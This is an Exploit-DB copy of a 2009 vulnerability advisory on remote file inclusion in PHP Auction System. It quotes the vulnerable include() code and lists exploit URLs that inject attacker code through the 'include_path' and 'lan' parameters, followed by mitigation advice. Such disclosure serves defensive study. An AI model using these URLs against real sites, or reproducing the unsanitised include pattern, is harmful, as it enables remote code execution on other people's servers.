PHPAuctionSystem Multiple Remote File Inclusion Vulnerability

vendor:

PHP Auction System

by:

darkmasking

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name: PHP Auction System

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHPAuctionSystem Multiple Remote File Inclusion Vulnerability

PHPAuctionSystem is vulnerable to a remote file inclusion vulnerability due to insufficient sanitization of the 'include_path' parameter in the 'settings.inc.php' file. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. This URL can be used to include a remote file containing arbitrary code, which will be executed by the web server.

Mitigation:

Input validation should be used to prevent the inclusion of remote files. The application should also be configured to use a safe include_path.

Source

Exploit-DB raw data:

[Â»]=======================================================================================================[_][-][X]
[Â»]                                                                             				[Â»]
[Â»]      		   PHPAuctionSystem Multiple Remote File Inclusion Vulnerability    			[Â»]
[Â»]              				         							[Â»]
[Â»]            		 	=======    ------d-------m------     ====    ====   				[Â»]
[Â»]             	 	||     =        | |(o o)| |          ||   ||   ||   				[Â»]
[Â»]             		||     =          ||(~)||            ||        ||   				[Â»]
[Â»]             	 	=======             /|\              ||        ||  				[Â»]
[Â»]=============================================================================================================[Â»]
[Â»] 				Author         	: ~darkmasking~		 					[Â»]
[Â»] 				Date           	: January, 6th 2009           					[Â»]
[Â»] 				Web           	: https://www.idsafeshield.com					[Â»]
[Â»]           		 	Contact        	: support[at]idsafeshield[dot]com  				[Â»]
[Â»]					Critical Level 	: Dangerous			  			[Â»]
[Â»]-------------------------------------------------------------------------------------------------------------[Â»]
[Â»]              		       Affected software description :        					[Â»]
[Â»]   				Software 	: PHP Auction System						[Â»]
[Â»]          			Vendor		: http://www.phpauctions.info/					[Â»]
[Â»]            			Price 	      	: $59.99							[Â»]
[Â»]=============================================================================================================[Â»]
[Â»]														[Â»]
[Â»]	[~] Vulnerable file											[Â»]
[Â»]														[Â»]
[Â»]		[+] all file below is affected by "include_path" parameter					[Â»]
[Â»]														[Â»]
[Â»]		./includes/settings.inc.php									[Â»]
[Â»]		$password_file = $include_path."passwd.inc.php";						[Â»]
[Â»]		include($password_file);									[Â»]
[Â»]		include $include_path."fonts.inc.php";								[Â»]
[Â»]		include $include_path."fontsize.inc.php";							[Â»]
[Â»]		include($include_path."currency.inc.php");							[Â»]
[Â»]		include($include_path."errors.inc.php");							[Â»]
[Â»]		include($include_path."https.inc.php");								[Â»]
[Â»]														[Â»]
[Â»]		./includes/auction_confirmation.inc.php								[Â»]
[Â»]		require("./includes/messages.inc.php");								[Â»]
[Â»]														[Â»]
[Â»]		./includes/converter.inc.php									[Â»]
[Â»]		include($include_path."nusoap.php");								[Â»]
[Â»]														[Â»]
[Â»]		./includes/messages.inc.php									[Â»]
[Â»]		require($include_path.'messages.'.$language.'.inc.php');					[Â»]
[Â»]														[Â»]
[Â»]		./includes/stats.inc.php									[Â»]
[Â»]		include $prefix."includes/useragent.inc.php";							[Â»]
[Â»]		include $prefix."includes/domains.inc.php";							[Â»]
[Â»]														[Â»]
[Â»]		./includes/useragent.inc.php									[Â»]
[Â»]		include $prefix."includes/browsers.inc.php";							[Â»]
[Â»]		include $prefix."includes/platforms.inc.php";							[Â»]
[Â»]														[Â»]
[Â»]		./includes/user_confirmation.inc.php								[Â»]
[Â»]		require("./includes/messages.inc.php");								[Â»]
[Â»]														[Â»]
[Â»]														[Â»]
[Â»]		[+] All file below is affected by "lan" parameter						[Â»]
[Â»]														[Â»]
[Â»]		./browse.php											[Â»]
[Â»]		./search.php											[Â»]
[Â»]		if(!empty($_GET['lan'])) {									[Â»]
[Â»]			$language = $lan;									[Â»]
[Â»]			$_SESSION['language'] = $language;							[Â»]
[Â»]														[Â»]
[Â»]		#// Set language cookie										[Â»]
[Â»]			setcookie("USERLANGUAGE",$lan,time()+31536000,"/");					[Â»]
[Â»]		} elseif(empty($_SESSION['language']) && !isset($_COOKIE['USERLANGUAGE'])) {			[Â»]
[Â»]			$language = $SETTINGS['defaultlanguage'];						[Â»]
[Â»]			$_SESSION['language'] = $language;							[Â»]
[Â»]														[Â»]
[Â»]		#// Set language cookie										[Â»]
[Â»]			setcookie("USERLANGUAGE",$language,time()+31536000);					[Â»]
[Â»]		} elseif(isset($_COOKIE['USERLANGUAGE'])) {							[Â»]
[Â»]			$language = $_COOKIE['USERLANGUAGE'];							[Â»]
[Â»]		}												[Â»]
[Â»]														[Â»]
[Â»]		require($include_path.'messages.'.$language.'.inc.php');					[Â»]
[Â»]														[Â»]
[Â»]-------------------------------------------------------------------------------------------------------------[Â»]
[Â»]														[Â»]
[Â»]	[~] Exploit												[Â»]
[Â»]														[Â»]
[Â»]	[+] "include_path" parameter										[Â»]
[Â»]														[Â»]
[Â»]	http://www.darkvictims.com/[path]/includes/settings.inc.php?include_path=[darkcode]			[Â»]
[Â»]	http://www.darkvictims.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode]		[Â»]
[Â»]	http://www.darkvictims.com/[path]/includes/converter.inc.php?include_path=[darkcode]			[Â»]
[Â»]	http://www.darkvictims.com/[path]/includes/messages.inc.php?include_path=[darkcode]			[Â»]
[Â»]	http://www.darkvictims.com/[path]/includes/stats.inc.php?include_path=[darkcode]			[Â»]
[Â»]	http://www.darkvictims.com/[path]/includes/useragent.inc.php?include_path=[darkcode]			[Â»]
[Â»]	http://www.darkvictims.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode]		[Â»]
[Â»]														[Â»]
[Â»]														[Â»]
[Â»]	[+] "lan" parameter											[Â»]
[Â»]														[Â»]
[Â»]	http://www.darkvictims.com/[path]/browse.php?lan=[darkcode]						[Â»]
[Â»]	http://www.darkvictims.com/[path]/search.php?lan=[darkcode]						[Â»]
[Â»]														[Â»]
[Â»]-------------------------------------------------------------------------------------------------------------[Â»]
[Â»]														[Â»]
[Â»] 	[~] How to fix this vulnerability									[Â»]
[Â»]														[Â»]
[Â»]    	Edit the source code to ensure that input is properly validated. Where is possible, 			[Â»]
[Â»]    	it is recommended to make a list of accepted filenames and restrict the input to that list.		[Â»]
[Â»]														[Â»]
[Â»]    	For PHP, the option allow_url_fopen would normally allow a programmer to open, 				[Â»]
[Â»]    	include or otherwise use a remote file using a URL rather than a local file path. 			[Â»]
[Â»]    	It is recommended to disable this option from php.ini.							[Â»]
[Â»]														[Â»]
[Â»]-------------------------------------------------------------------------------------------------------------[Â»]
[Â»]														[Â»]
[Â»]	[~] Greetz												[Â»]
[Â»]														[Â»]
[Â»]	BUAT DIRI SENDIRI AJA [ Sorry Bro belum dapat teman :) ]						[Â»]
[Â»]														[Â»]
[Â»]														[Â»]
[Â»]=============================================================================================================[Â»]

# milw0rm.com [2009-01-06]